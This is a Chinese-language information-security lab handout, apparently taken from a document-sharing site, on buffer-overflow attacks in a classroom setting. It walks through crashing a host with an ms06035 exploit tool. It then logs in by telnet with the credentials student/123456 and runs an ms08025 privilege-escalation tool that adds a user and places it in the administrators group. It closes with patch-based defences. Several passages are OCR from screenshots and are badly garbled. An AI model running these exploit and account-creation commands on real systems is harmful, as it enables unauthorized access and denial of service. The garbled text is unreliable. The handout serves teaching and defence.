信息安全实验

上传人:鲁** 文档编号:513846358 上传时间:2023-05-09 格式:DOCX 页数:9 大小:407.18KB
返回 下载 相关 举报
信息安全实验_第1页
第1页 / 共9页
信息安全实验_第2页
第2页 / 共9页
信息安全实验_第3页
第3页 / 共9页
信息安全实验_第4页
第4页 / 共9页
信息安全实验_第5页
第5页 / 共9页
点击查看更多>>
资源描述

《信息安全实验》由会员分享,可在线阅读,更多相关《信息安全实验(9页珍藏版)》请在金锄头文库上搜索。

1、缓冲区溢出一、实验目的掌握缓冲区溢出攻击的现象掌握使用缓冲区溢出工具的方法二、实验步骤实验主机实验角色主机A攻击者主机B被攻击者利用ms06035漏洞进行攻击1进入“ ms06035漏洞利用工具”目录主机A单击工具栏中“ms06035工具”按钮,进入“ms06035漏洞利用工具”工作目 录。2查看当前目录内容主机A用dir命令查看当前目录中的内容,如下图所示:图 4-1-1 工具目录中的内容上图中标注的“ms06035.exe”即为ms06035漏洞利用工具。3.使用“ ms06035工具”进行攻击主机A执行“ms06035.exe主机B的ip 445”命令,发起对主机B的攻击。4主机 B 观

2、察被攻击现象主机B被攻击后出现蓝屏死机的现象(实验结束,主机B用虚拟机“快照X”恢复实验环境)。二利用ms08025漏洞进行攻击以下步骤两主机互相攻击对方,操作相同,故以主机 A 为例说明实验步骤。注主机B单击“ms08025工具”按钮,进入实验目录。将ms08025.exe复制到D盘 的根目录下,以便实验下一步进行。1telnet 登录系统(1)主机A在命令行下使用telnet登录同组主机,当出现“您将要把您的密码信息送 到Internet区内的一台远程计算机上,这可能不安全,您还要发送吗(y/n)”当出现此提示 时,选择n,输入登录账号“student”,密码“ 123456”。登录成功如

3、下图所示。We leone to Microsoft Telnet Sevuev.C: DocLiments and Sett ings Xstudent,图 4-1-2 telnet 登录(2)主机A依次输入“d:”丨“dir”查看同组主机D盘根目录,“ms08025.exe”即为实验工具。图 4-1-3 实验工具2使用系统命令添加用户主机A使用“net user studentl /add”命令来试添加一个用户“studentl ”,执行该命令,出现“发生系统错误 5,拒绝访问”的提示,如下图所示:H1224Telnet 172.16.0.IllWelcome to Microsoft T

4、elnet Seruer.C:Documents and Settingsstudentd-D:dir驱动器D中的卷是ExpNIC 悉的序列号是5485-69D8D:的目录D:net user studentl /add 发生系统错误5.拒绝访问。ExpNIC19,456 ms08025.exe2008-09-2?17:00 Uork1个文件19,456字节2个目录73,719,746,560可用字节2012-07-132012-07-06图 4-1-4 使用系统命令添加用户请解释出现上述现象的原因:3查看 ms08025 工具使用方法主机A在telnet命令行中输入“ms08025.exe”

5、,查看工具的使用方法,如下图所示:lolH122400ca Telnet 172.1B.0.illD:的目录拒绝访问。D:Xns08025.exeUsage: ms08025 exe Example: ms08025 exe uhoami2012-07-132012-07-062008-09-27MS08-025 Windows Local Priuilege Escalation Uulnerability Exploit By 009, baickeiPJiotmail .comTEST OS: Win2K CN SP2 ,Win2k3 CN SP1D:net user studentl

6、/add发生系统错误5ExpNIC19,456 ms08025 _exeWork19,456字节1个文件2个目录73,719,746,560可用字节图 4-1-5 ms08025 工具使用方法4使用 ms08025 工具添加用户主机A执行“ms08025.exe net user studentl /add ”命令,提示命令成功完成,证明用户 student1 成功添加,如下图所示:主机A用命令“net user studentl”查看用户studentl的信息,发现用户studentl创建成功,隶属于 Users 组。如下图所示:命令成功完成。可允许的登录小吋数允许的工作站 用卢配置文件 主

7、目录上次登录2014-6-12 21:112014-7-25 19:592014-6-12 21:11VesVesfill从不AllTelnet 172.IB.0.ill撬用期 1.rll- n TJ- .冢户户马 代7MJ sers None000 系统默认值 es 从不码 密 码 改 密改隔 可密可 次码码要户 上密密击而用图 4-l-7 用户 studentl 信息D:ms08025匕x巳 Mnet localgroup admin istrators studentl /add1: 成 口 KP囚完 成成功 组组成 地局令 本全命D:型注用国膽net user studentl户名st

8、udentl户的?主释 寒 地区代码户到期码 密 码 改 密改庚 可密可 次码码要户 上密密无而用允许的工作站 用芦配置文件 主目录上次登录000 nis06035 .ce 172.16.0.25 44G(2)安装ms06063漏洞补丁:由于 ms06063 和 ms06035 漏洞都属于 server 服务中的漏洞, ms06035 的漏洞补丁没有 彻底解决它的漏洞问题,所以在 ms06063 中做了进一步更新,即安装 ms06063 漏洞补丁就 包含 ms06035 的补丁。具体方法:单击工具栏中的“ ms06063 补丁”按钮,按照提示进行安装,安装补丁后, 请重新做一遍实验(对 ms0

9、6035 漏洞进行攻击),对比一下实验现象。C : XExpNISQietflD LethXToaIssOuierFlnwXRcnotieOverf lDwrmsBfji635 .kmg 172.16.0.25 4452. ms08025漏洞攻击的防御方法安装 ms08025 漏洞补丁:单击工具栏中的“ms08025补丁”按钮,根据提示进行安装,安装完成后,请重新做一遍实验(对 ms08025 漏洞进行攻击),对比一下实验现象.B;Xms08025.exe qpnet user studen1;2 /add11MS08-025 Vlndoys Local Priwliege Escalatio

10、n Uulnepahility ExploIt By 009R bAickepOTEST OS: Uin2K CH SP2 ,Win2k3 CNi SP1Herne 1 is XUINDOWSsysten32Mitkrnlpa.exeGet KeFineLB-ase SuctrCs ntkrnlpa.exe base 80800000Happing ntkrn lpa.exe . . ok KeServ ice DescriptoiT able = 006DF460 Find KiSericeTable . Get ZuUdimControl Hunber .ok! ZwUdnContvol Call Nmnhep:16HookAddress: SB82100CI+J Executing Shellcode.D 3发生系统错误昭k巨绝诂问&实验总结通过本次实验,了解到缓冲区溢出是一种在各种操作系统、应用软件中广泛存在普遍且 危险的漏洞,利用缓冲区溢出攻击可以导致程序运行失败、系统崩溃等后果。因此,如何及 时有效地检测出计算机网络系统入侵行为,已成为网络安全管理的一项重要内容。这也是作为程序开发人员要注意的地方,在项目开发中要尽量避免这种不健壮的代码书 写。

展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 学术论文 > 其它学术论文

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号